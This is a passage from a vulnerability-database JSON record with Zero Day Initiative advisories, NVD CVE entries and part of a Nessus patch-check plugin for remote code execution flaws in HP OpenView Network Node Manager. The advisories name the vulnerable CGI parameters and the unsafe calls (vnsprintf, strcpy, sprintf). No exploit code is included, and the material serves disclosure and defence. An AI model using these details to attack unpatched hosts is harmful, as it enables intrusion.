Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23821", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23821", "title": "ZDI-10-084: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1550"], "description": "ZDI-10-081: HP OpenView NNM ovet_demandpoll sel CGI Variable Format String Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-081\r\nMay 11, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1550\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9273. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Network Node Manager. Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the ovet_demandpoll.exe process. 
This\r\nprocess can be started by invoking the webappmon.exe CGI application\r\nthrough the webserver. The process calls vnsprintf() directly with the\r\ncontents of the 'sel' POST variable. By providing a malicious value this\r\nformat string vulnerability can be leveraged by remote attackers to\r\nexecute arbitrary code under the context of the ovet_demandpoll.exe\r\nprocess.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\r\n\r\n-- Disclosure Timeline:\r\n2009-10-21 - Vulnerability reported to vendor\r\n2010-05-11 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23819", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23819", "title": "ZDI-10-081: HP OpenView NNM ovet_demandpoll sel CGI Variable Format String Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1552"], "description": "ZDI-10-083: HP OpenView NNM snmpviewer.exe CGI Multiple Variable Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-083\r\nMay 11, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1552\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9268. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Network Node Manager. Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the snmpviewer.exe CGI. 
The doLoad\r\nfunction in this process calls sprintf() with a %s format specifier and\r\nunsanitized user input retrieved from two separate POST variables (act\r\nand app). By providing large enough strings a remote attacker can cause\r\na stack-based buffer overflow and eventually execute arbitrary code\r\nunder the context of the webserver process.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\r\n\r\n-- Disclosure Timeline:\r\n2010-02-11 - Vulnerability reported to vendor\r\n2010-05-11 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23820", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23820", "title": "ZDI-10-083: HP OpenView NNM snmpviewer.exe CGI Multiple Variable Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1551"], "description": "ZDI-10-082: HP OpenView NNM netmon sel CGI Variable Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-082\r\nMay 11, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1551\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9271. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Network Node Manager. 
Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the Network Monitor (netmon.exe) daemon.\r\nThis process can be started by invoking the webappmon.exe CGI\r\napplication through the webserver. When the _OVParseLLA function defined\r\nwithin ov.dll is called from netmon.exe it directly copies the value of\r\nthe 'sel' POST variable into a fixed-length stack buffer with a call to\r\nstrcpy(). This can be leveraged by remote attackers to execute arbitrary\r\ncode under the context of the webserver process.\r\n\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\r\n\r\n-- Disclosure Timeline:\r\n2009-10-21 - Vulnerability reported to vendor\r\n2010-05-11 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23818", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23818", "title": "ZDI-10-082: HP OpenView NNM netmon sel CGI Variable Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T05:44:58", "description": "Stack-based buffer overflow in getnnmdata.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via an invalid iCount parameter.", "edition": 4, "cvss3": {}, "published": "2010-05-13T17:30:00", "title": "CVE-2010-1554", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1554"], "modified": "2018-10-11T21:01:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.0.1", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": 
"CVE-2010-1554", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1554", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:44:58", "description": "Stack-based buffer overflow in getnnmdata.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via an invalid MaxAge parameter.", "edition": 4, "cvss3": {}, "published": "2010-05-13T17:30:00", "title": "CVE-2010-1553", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1553"], "modified": "2018-10-10T19:57:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.0.1", 
"cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2010-1553", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1553", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:44:58", "description": "Format string vulnerability in ovet_demandpoll.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via format string specifiers in the sel parameter.", "edition": 4, "cvss3": {}, "published": "2010-05-13T17:30:00", "title": "CVE-2010-1550", "type": "cve", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1550"], "modified": "2018-10-10T19:57:00", "cpe": 
["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.0.1", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2010-1550", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1550", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:44:58", "description": "Stack-based buffer overflow in the doLoad function in snmpviewer.exe in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via the act and app parameters.", "edition": 4, "cvss3": {}, "published": "2010-05-13T17:30:00", "title": "CVE-2010-1552", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2010-1552"], "modified": "2018-10-10T19:57:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.0.1", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2010-1552", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1552", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:44:58", "description": "Stack-based buffer overflow in the _OVParseLLA function in ov.dll in netmon.exe in Network Monitor in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via the sel parameter.", "edition": 4, "cvss3": {}, "published": "2010-05-13T17:30:00", "title": "CVE-2010-1551", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1551"], "modified": "2018-10-10T19:57:00", "cpe": ["cpe:/a:hp:openview_network_node_manager:7.51", "cpe:/a:hp:openview_network_node_manager:7.0.1", "cpe:/a:hp:openview_network_node_manager:7.53"], "id": "CVE-2010-1551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1551", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:openview_network_node_manager:7.51:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:hp-ux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:-:linux:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:solaris:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.53:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:-:windows:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:hp:openview_network_node_manager:7.51:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-12T11:32:18", "description": "s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server. References: CVE-2010-1964 (SSRT100026,\n ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\n CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. 
References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential security vulnerability has been identified\n with HP OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server.", "edition": 24, "published": "2010-05-17T00:00:00", "title": "HP-UX PHSS_40707 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1964", "CVE-2010-2709", "CVE-2010-1961", "CVE-2010-1555", "CVE-2010-1552", "CVE-2010-1960", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "modified": "2010-05-17T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40707.NASL", "href": "https://www.tenable.com/plugins/nessus/46347", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40707. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46347);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\", \"CVE-2010-1553\", \"CVE-2010-1554\", \"CVE-2010-1555\", \"CVE-2010-1960\", \"CVE-2010-1961\", \"CVE-2010-1964\", \"CVE-2010-2709\");\n script_xref(name:\"HP\", value:\"emr_na-c02153379\");\n script_xref(name:\"HP\", value:\"emr_na-c02217439\");\n script_xref(name:\"HP\", value:\"emr_na-c02446520\");\n script_xref(name:\"HP\", value:\"SSRT010098\");\n\n script_name(english:\"HP-UX PHSS_40707 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server. References: CVE-2010-1964 (SSRT100026,\n ZDI-CAN-683) CVE-2010-1960 (SSRT100027, ZDI-CAN-684)\n CVE-2010-1961 (SSRT100028, ZDI-CAN-685).\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. 
References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential security vulnerability has been identified\n with HP OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code under the context of the user running the\n web server.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5f413ca\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f9c68a79\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?094465cf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40707 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/03\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11 11.23 11.31\", proc:\"parisc\"))\n{\n exit(0, \"The host is not affected since PHSS_40707 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_40707\", \"PHSS_41242\", \"PHSS_41606\", \"PHSS_41857\", \"PHSS_42232\", \"PHSS_43046\", \"PHSS_43353\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-IPV6\", version:\"B.07.50.00\")) 